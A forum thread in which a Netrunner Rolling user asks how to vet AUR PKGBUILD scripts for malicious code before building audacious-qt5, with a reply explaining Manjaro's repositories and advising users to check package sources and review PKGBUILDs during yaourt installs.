Building a package that is not in the official repos, but is in AUR

Netrunner Rolling Rolling 2016.01
1

I have been cautioned on this forum not to blindly install packages from AUR using yaourt because they could lead to problems, including execution of malicious code, and rendering my system unusable.

I am now thinking of trying my hand at making a package that is not in the official repos: audacious-qt5

It appears that the most difficult part is to generate the PKGBUILD script. I have gleaned from the Web that one should check the PKGBUILD script to see if it is “safe” before installing something that AUR points to.

I have come across a question entitled Convenient way to check AUR PKGBUILD against malicious code? but unfortunately, it remains unanswered.

Are there any guidelines on where and what to look for in a PKGBUILD to ensure that it is safe?

And, might one, after scanning and convincing oneself that the PKGBUILD is safe, install from AUR using yaourt? Or does one need to build the package oneself, as would be the case if the PKGBUILD needed to be changed?

The information on building Arch packages is too “componentized” and distributed across several wikis to give a coherent overall picture of the process. A single example of how to do this from alpha to omega with any “helper” would be very useful to one who hasn’t done it before. Is there such a tutorial?

Also, can one use the AUR directly, or should one use other repos, because NRR is built upon Manjaro which is on top of Arch?

Sorry for the number of questions and their length.

Thanks.

2

First, Manjaro is NOT built on top of arch, they use their own repositories. They also use a different graphics stack and hardware detection (MHWD) than arch and provide multiple kernels versions for you to choose from, as well as many other packages that are not found in arch proper. However yes, many of their packages are pulled from the Arch stable repository into their own unstable repository, where they are vetted and sent to testing, after a week or so of testing they are then sent on to stable once deemed as such.

Installing packages from the AUR is mostly safe, however you should take note as to where the source code or rpm/deb files are coming from. If they are from the original developers sources or another or distributions repositories they are usually safe, if they are not from an official source and hosted elsewhere then you need to ask yourself how much you trust that source and/or the maintainer of that AUR entry.

You are asked during the yaourt proccess if you would like to edit the pkgbuild, this is the best way of viewing and editing the pkgbuild yourself. You can also screen these before hand by using the online AUR search here:
https://aur.archlinux.org/